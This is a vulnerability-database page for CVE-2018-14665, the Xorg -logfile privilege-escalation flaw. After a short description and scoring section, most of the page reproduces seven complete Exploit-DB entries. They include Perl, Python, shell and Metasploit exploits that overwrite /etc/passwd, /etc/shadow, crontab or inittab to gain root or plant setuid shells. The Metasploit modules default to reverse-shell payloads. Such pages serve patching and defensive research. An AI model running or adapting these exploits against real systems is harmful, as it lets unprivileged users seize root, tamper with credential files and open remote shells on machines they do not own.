CVE-2018-14665 Detail

CVE-2018-14665

Score / Severity

6.6

Medium

CVE Descriptions

A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-863	Incorrect Authorization The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.0	6.6	MEDIUM	CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Physical A vulnerability exploitable with Physical access requires the attacker to physically touch or manipulate the vulnerable component. Physical interaction may be brief (e.g. evil maid attack [1]) or persistent. An example of such an attack is a cold boot attack which allows an attacker to access to disk encryption keys after gaining physical access to the system, or peripheral attacks such as Firewire/USB Direct Memory Access attacks. Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. Low The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. High There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics	[email protected]
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 45938

Publication date : 2018-12-03 23h00 +00:00
Author : 0xdono
EDB Verified : No

# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation # Date: 29/11/2018 # Exploit Author: @0xdono # Original Discovery and Exploit: Narendra Shinde # Vendor Homepage: https://www.x.org/ # Platform: AIX # Version: X Window System Version 7.1.1 # Fileset: X11.base.rte < 7.1.5.32 # Tested on: AIX 7.1 (6.x to 7.x should be vulnerable) # CVE: CVE-2018-14665 # # Explanation: # Incorrect command-line parameter validation in the Xorg X server can # lead to privilege elevation and/or arbitrary files overwrite, when the # X server is running with elevated privileges. # The -logfile argument can be used to overwrite arbitrary files in the # file system, due to incorrect checks in the parsing of the option. # # This is a port of the OpenBSD X11 Xorg exploit to run on AIX. # It overwrites /etc/passwd in order to create a new user with root privileges. # All currently logged in users need to be included when /etc/passwd is overwritten, # else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. # The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, # and is replaced by '-config'. # ksh93 is used for ANSI-C quoting, and is installed by default on AIX. # # IBM has not yet released a patch as of 29/11/2018. # # See also: # https://lists.x.org/archives/xorg-announce/2018-October/002927.html # https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html # https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl # # Usage: # $ oslevel -s # 7100-04-00-0000 # $ Xorg -version # # X Window System Version 7.1.1 # Release Date: 12 May 2006 # X Protocol Version 11, Revision 0, Release 7.1.1 # Build Operating System: AIX IBM # Current Operating System: AIX sovma470 1 7 00C3C6F54C00 # Build Date: 07 July 2006 # Before reporting problems, check http://wiki.x.org # to make sure that you have the latest version. # Module Loader present # $ id # uid=16500(nmyo) gid=1(staff) # $ perl aixxorg.pl # [+] AIX X11 server local root exploit # [-] Checking for Xorg and ksh93 # [-] Opening /etc/passwd # [-] Retrieving currently logged in users # [-] Generating Xorg command # [-] Opening /tmp/wow.ksh # [-] Writing Xorg command to /tmp/wow.ksh # [-] Backing up /etc/passwd to /tmp/passwd.backup # [-] Making /tmp/wow.ksh executable # [-] Executing /tmp/wow.ksh # [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh # [-] Done # [+] 'su wow' for root shell # $ su wow # # id # uid=0(root) gid=0(system) # # whoami # root #!/usr/bin/perl print "[+] AIX X11 server local root exploit\n"; # Check Xorg is in path print "[-] Checking for Xorg and ksh93 \n"; chomp($xorg = `command -v Xorg`); if ($xorg eq ""){ print "[X] Can't find Xorg binary, try hardcode it? exiting... \n"; exit; } # Check ksh93 is in path chomp($ksh = `command -v ksh93`); if ($ksh eq ""){ print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n"; exit; } # Read in /etc/passwd print "[-] Opening /etc/passwd \n"; open($passwd_fh, '<', "/etc/passwd"); chomp(@passwd_array = <$passwd_fh>); close($passwd_fh); # Retrieve currently logged in users print "[-] Retrieving currently logged in users \n"; @users = `who | cut -d' ' -f1 | sort | uniq`; chomp(@users); # For all logged in users, add their current passwd entry to string # that will be used to overwrite passwd $users_logged_in_passwd = ''; foreach my $user (@users) { $user .= ":"; foreach my $line (@passwd_array) { if (index($line, $user) == 0) { $users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line; } } } # Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log print "[-] Generating Xorg command \n"; $blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\''; print "[-] Opening /tmp/wow.ksh \n"; open($fr, '>', "/tmp/wow.ksh"); # Use ksh93 for ANSI-C quoting print "[-] Writing Xorg command to /tmp/wow.ksh \n"; print $fr '#!' . "$ksh\n"; print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n"; close $fr; # Backup passwd print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n"; system("cp /etc/passwd /tmp/passwd.backup"); # Make script executable and run it print "[-] Making /tmp/wow.ksh executable \n"; system("chmod +x /tmp/wow.ksh"); print "[-] Executing /tmp/wow.ksh \n"; system("/tmp/wow.ksh"); # Replace overwritten passwd with: original passwd + wow user print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n"; $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`; print "[-] Done \n"; print "[+] 'su wow' for root shell \n";

Exploit Database EDB-ID : 45832

Publication date : 2018-11-12 23h00 +00:00
Author : bolonobolo
EDB Verified : No

# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7) # Date: 2018-11-07 # Exploit Author: @bolonobolo # Vendor Homepage: https://www.x.org/ # Version: 1.19.5 # Tested on: RHEL 7.3 && 7.5 # CVE : CVE-2018-14665 # Explanation # The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user # has to be logged in trought console at the moment the PE script launched. # In fact during the logged in session of the legitimate non-root user, # a file with the name of the non-root user will be created in the /var/run/console folder. # With that file present, the same non-root user can launch a Xorg command via SSH. # # Usage: $ python poc.py # $ python poc.py # [*] Waiting for bolo to connect to the console # [*] OK --> bolo console opened # [*] Building root shell wait 2 minutes # [*] crontab overwritten # # ... cut Xorg output ... # # [*] Xorg killed # (II) Server terminated successfully (0). Closing log file. # [*] Don't forget to cleanup /etc/crontab and /tmp dir # sh-4.2# id && whoami # uid=0(root) gid=0(root) gruppi=0(root),1001(bolo) # root # sh-4.2# #!/usr/bin/python import os import getpass import subprocess userList = [] path="/var/run/console/" def getWhoami(): return getpass.getuser() def getConsole(path): p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE) (console, err) = p.communicate() consoleList = str.splitlines(console) return consoleList def payload(): f = open("/tmp/payload", "w") payload = ("cp /bin/sh /usr/local/bin/shell\n" "echo \"#include <stdio.h> \" > /tmp/shell.c\n" "echo \"#include <stdlib.h>\" >> /tmp/shell.c\n" "echo \"#include <sys/types.h>\" >> /tmp/shell.c\n" "echo \"#include <unistd.h>\" >> /tmp/shell.c\n" "echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n" "gcc /tmp/shell.c -o /usr/local/bin/shell\n" "chmod 4777 /usr/local/bin/shell\n") f.write(payload) def executePayload(): os.system("chmod +x /tmp/payload") os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &") print "[*] crontab overwritten" os.system("sleep 5") os.system("pkill Xorg") print "[*] Xorg killed" os.system("sleep 120") return def main(): whoami = getWhoami() print "[*] Waiting for " + whoami + " to connect to the console" i = 0 while (i == 0): consoleList = getConsole(path) for user in consoleList: if user == whoami : print "[*] OK --> " + user + " console opened" i = 1 print "[*] Building root shell wait 2 minutes" payload() executePayload() print "[*] Don't forget to cleanup /etc/crontab and /tmp dir" os.system("/usr/local/bin/shell") if __name__ == '__main__': main()

Exploit Database EDB-ID : 45908

Publication date : 2018-11-25 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel def initialize(info = {}) super(update_info(info, 'Name' => 'Xorg X11 Server SUID privilege escalation', 'Description' => %q{ This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). CentOS default install will require console auth for the users session. Cron launches the payload so if Selinux is enforcing exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistant with starting Xorg and running a cron. }, 'License' => MSF_LICENSE, 'Author' => [ 'Narendra Shinde', # Discovery and exploit 'Raptor - 0xdea', # Modified exploit for cron 'Aaron Ringo', # Metasploit module 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module ], 'DisclosureDate' => 'Oct 25 2018', 'References' => [ [ 'CVE', '2018-14665' ], [ 'BID', '105741' ], [ 'EDB', '45697' ], [ 'EDB', '45742' ], [ 'EDB', '45832' ], [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ], [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] ], 'Platform' => %w[openbsd linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'SessionTypes' => %w[shell meterpreter], 'Targets' => [ ['OpenBSD', { 'Platform' => 'unix', 'Arch' => [ ARCH_CMD ] } ], ['Linux x64', { 'Platform' => 'linux', 'Arch' => [ ARCH_X64 ] } ], ['Linux x86', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ] } ] ], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl', 'WfsDelay' => 120 }, 'DefaultTarget' => 0)) register_advanced_options( [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) ] ) end def check # linux checks uname = cmd_exec "uname" if uname =~ /linux/i vprint_status "Running additional check for Linux" if datastore['ConsoleLock'] user = cmd_exec "id -un" unless exist? "/var/run/console/#{user}" vprint_error "No console lock for #{user}" return CheckCode::Safe end vprint_good "Console lock for #{user}" end if selinux_installed? if selinux_enforcing? vprint_error 'Selinux is enforcing' return CheckCode::Safe end end vprint_good "Selinux is not an issue" end # suid program check xorg_path = cmd_exec "command -v Xorg" unless xorg_path.include?("Xorg") vprint_error "Could not find Xorg executable" return CheckCode::Safe end vprint_good "Xorg path found at #{xorg_path}" unless setuid? xorg_path vprint_error "Xorg binary #{xorg_path} is not SUID" return CheckCode::Safe end vprint_good "Xorg binary #{xorg_path} is SUID" # version check x_version = cmd_exec "Xorg -version" if x_version.include?("Release Date") v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first) unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) vprint_error "Xorg version #{v} not supported" return CheckCode::Safe end elsif x_version.include?("Fatal server error") vprint_error "User probably does not have console auth" vprint_error "Below is Xorg -version output" vprint_error x_version return CheckCode::Safe else vprint_warning "Could not parse Xorg -version output" return CheckCode::Appears end vprint_good "Xorg version #{v} is vulnerable" # process check for /X proc_list = cmd_exec "ps ax" if proc_list.include?('/X ') vprint_warning('Xorg in process list') return CheckCode::Appears end vprint_good('Xorg does not appear running') return CheckCode::Vulnerable end def on_new_session(session) if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\"" else session.shell_command(@clean_up) end print_good "Returning session after cleaning" ensure super end def exploit check_status = check if check_status == CheckCode::Appears print_warning 'Could not get version or Xorg process possibly running, may fail' elsif check_status == CheckCode::Safe fail_with Failure::NotVulnerable, 'Target not vulnerable' end if is_root? fail_with Failure::BadConfig, 'This session already has root privileges' end unless writable? datastore['WritableDir'] fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" end print_good 'Passed all initial checks for exploit' pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}" @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old" xdisplay = datastore['Xdisplay'] # Uploading file crontab will run print_status 'Uploading your payload, this could take a while' if payload.arch.first == 'cmd' write_file(pscript, payload.encoded) else write_file(pscript, generate_payload_exe) end register_file_for_cleanup pscript chmod pscript # Exploit steps on crontab so backing it up cmd_exec "cat /etc/crontab > #{pscript}.b" # Actual exploit with cron overwrite print_status 'Trying /etc/crontab overwrite' cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null" Rex.sleep 5 cmd_exec "pkill Xorg" Rex.sleep 1 cron_check = cmd_exec "grep -F #{pscript} /etc/crontab" unless cron_check.include? pscript rm_f "#{pscript}.b" print_error 'Deleting crontab backup' fail_with Failure::NotVulnerable, '/etc/crontab not modified' end print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...' end end

Exploit Database EDB-ID : 45697

Publication date : 2018-10-24 22h00 +00:00
Author : Hacker Fantastic
EDB Verified : No

#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 6.4 stable - exploit # uses cve-2018-14665 to overwrite files as root. # Impacts Xorg 1.19.0 - 1.20.2 which ships setuid # and vulnerable in default OpenBSD. # # - https://hacker.house echo [+] OpenBSD 6.4-stable local root exploit cd /etc Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & sleep 5 pkill Xorg echo [-] dont forget to mv and chmod /etc/master.passwd.old back echo [+] type 'Password1' and hit enter for root su - EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

Exploit Database EDB-ID : 45742

Publication date : 2018-10-29 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : No

# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.x.org/ # Version: xorg-x11-server 1.19.0 - 1.20.2 # Tested on: OpenBSD 6.3 and 6.4 # CVE : CVE-2018-14665 # raptor_xorgasm #!/bin/sh # # raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron # Copyright (c) 2018 Marco Ivaldi <[email protected]> # # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission # check for -modulepath and -logfile options when starting Xorg. X server # allows unprivileged users with the ability to log in to the system via # physical console to escalate their privileges and run arbitrary code under # root privileges (CVE-2018-14665). # # This exploit targets OpenBSD's cron in order to escalate privileges to # root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical # console, it works perfectly on pseudo-terminals connected via SSH as well. # # See also: # https://lists.x.org/archives/xorg-announce/2018-October/002927.html # https://www.exploit-db.com/exploits/45697/ # https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 # # Usage: # blobfish$ chmod +x raptor_xorgasm # blobfish$ ./raptor_xorgasm # [...] # Be patient for a couple of minutes... # [...] # Don't forget to cleanup and run crontab -e to reload the crontab. # -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab # -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned # blobfish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): # OpenBSD 6.4 (Xorg 1.19.6) [tested] # OpenBSD 6.3 (Xorg 1.19.6) [tested] # echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron" echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>" # prepare the payload cat << EOF > /tmp/xorgasm cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid chmod 4777 /usr/local/bin/pwned EOF chmod +x /tmp/xorgasm # trigger the bug cd /etc Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 & sleep 5 pkill Xorg # run the setuid shell echo echo "Be patient for a couple of minutes..." echo sleep 120 echo echo "Don't forget to cleanup and run crontab -e to reload the crontab." ls -l /etc/crontab* ls -l /usr/local/bin/pwned /usr/local/bin/pwned

Exploit Database EDB-ID : 46142

Publication date : 2019-01-13 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : No

#!/bin/sh # Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab) # Date: 2018-11-25 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.x.org/ # Version: xorg-x11-server 1.19.0 - 1.20.2 # Tested on: Oracle Solaris 11.4 # CVE : CVE-2018-14665 # # raptor_solgasm - xorg-x11-server LPE via Solaris inittab # Copyright (c) 2018 Marco Ivaldi <[email protected]> # # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission # check for -modulepath and -logfile options when starting Xorg. X server # allows unprivileged users with the ability to log in to the system via # physical console to escalate their privileges and run arbitrary code under # root privileges (CVE-2018-14665). # # "In video games, this is what they call respawning" -- Nick Sax # # This exploit targets /etc/inittab in order to escalate privileges to root # on Solaris 11 (no need to be connected to a physical console). Messing with # inittab is considerably dangerous and you may trash your system, however the # other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't # work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING! # # See also: # https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm # # Usage: # raptor@stalker:~$ chmod +x raptor_solgasm # raptor@stalker:~$ ./raptor_solgasm # [...] # Now please be patient for a few minutes... # [...] # To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab # -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab # -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old # -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned # root@stalker:/etc# id # uid=0(root) gid=0(root) # # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): # Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] # Oracle Solaris 11 SPARC [untested] # echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab" echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>" # prepare the payload cat << EOF > /tmp/solgasm cp /bin/zsh /tmp/pwned # fallback in case gcc is not available echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c gcc /tmp/pwned.c -o /tmp/pwned chmod 4777 /tmp/pwned EOF chmod +x /tmp/solgasm # trigger the bug PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1) cd /etc Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 & sleep 5 pkill Xorg # run the setuid shell echo echo "Now please be patient for a few minutes..." echo until [ -u /tmp/pwned ]; do sleep 1; done echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab" ls -l /etc/inittab* ls -l /tmp/pwned sleep 1 /tmp/pwned

Exploit Database EDB-ID : 47701

Publication date : 2019-11-19 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Xorg X11 Server Local Privilege Escalation', 'Description' => %q( WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd. ), 'Author' => [ 'Narendra Shinde', # Discovery and original FreeBSD exploit 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 25 2018', 'Notes' => { 'SideEffects' => [ CONFIG_CHANGES ] }, 'References' => [ ['CVE', '2018-14665'], ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'], ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'], ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'], ['EDB', '45938'] ], 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'SessionTypes' => ['shell'], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl' } }, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_perl' }, 'Targets' => [ ['IBM AIX Version 6.1', {}], ['IBM AIX Version 7.1', {}], ['IBM AIX Version 7.2', {}] ], 'DefaultTarget' => 1)) register_options( [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] ) end def check xorg_path = cmd_exec('command -v Xorg') if !xorg_path.include?('Xorg') print_error('Could not find Xorg executable') return Exploit::CheckCode::Safe end ksh93_path = cmd_exec('command -v ksh93') if !ksh93_path.include?('ksh') print_error('Could not find Ksh93 executable') return Exploit::CheckCode::Safe end if !xorg_vulnerable? print_error('Xorg version is not vulnerable') return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit status = check if status == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, '') end if !writable?(datastore['WritableDir']) fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable") end xorg_path = cmd_exec('command -v Xorg') ksh93_path = cmd_exec('command -v ksh93') xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir']) xorg_script_path = "#{datastore['WritableDir']}/wow.ksh" upload_and_chmodx(xorg_script_path, xorg_payload) passwd_backup = "#{datastore['WritableDir']}/passwd.backup" print_status("Backing up /etc/passwd to #{passwd_backup}") cmd_exec("cp /etc/passwd #{passwd_backup}") register_file_for_cleanup(passwd_backup) print_status("Executing #{xorg_script_path}") cmd_exec(xorg_script_path) print_status('Checking if we are root') if root? shell_payload = %(#!#{ksh93_path} #{payload.encoded} ) shell_script_path = "#{datastore['WritableDir']}/wowee.ksh" upload_and_chmodx(shell_script_path, shell_payload) print_status('Executing shell payload') cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"") print_status('Restoring original /etc/passwd') cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"") else fail_with(Failure::PayloadFailed, '') end end def generate_xorg_payload(xorg_path, ksh93_path, writabledir) passwd_file = read_file('/etc/passwd') passwd_array = passwd_file.split("\n") print_status('Retrieving currently logged in users') users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq') users << "\n" users_array = users.split("\n") logged_in_users = '' if !users_array.empty? users_array.each do |user| user << ':' passwd_array.each do |line| if line.index(user) == 0 logged_in_users << '\n' logged_in_users << line end end end end passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'" subdir_count = writabledir.count('/') relative_passwd = '../' * subdir_count + '../../etc/passwd' return %(#!#{ksh93_path} #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1 ) end def xorg_vulnerable? version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'') print_status("Xorg version is #{version}") semantic_version = Gem::Version.new(version) vulnerable_versions = [ ['6.1.9.0', '6.1.9.100'], ['7.1.4.0', '7.1.4.30'], ['7.1.5.0', '7.1.5.31'], ['7.2.0.0', '7.2.0.1'], ['7.2.1.0', '7.2.1.0'], ['7.2.2.0', '7.2.2.0'], ['7.2.3.0', '7.2.3.15'] ] vulnerable_versions.each do |version_pair| if semantic_version >= Gem::Version.new(version_pair[0]) && semantic_version <= Gem::Version.new(version_pair[1]) return true end end return false end def root? id_output = cmd_exec('su - wow -c "id"') if id_output.include?('euid=0') || id_output.include?('uid=0') print_good('Got root!') return true end print_error('Not root') false end def upload_and_chmodx(path, data) print_status("Writing to #{path}") rm_f(path) write_file(path, data) cmd_exec("chmod 0555 '#{path}'") register_file_for_cleanup(path) end end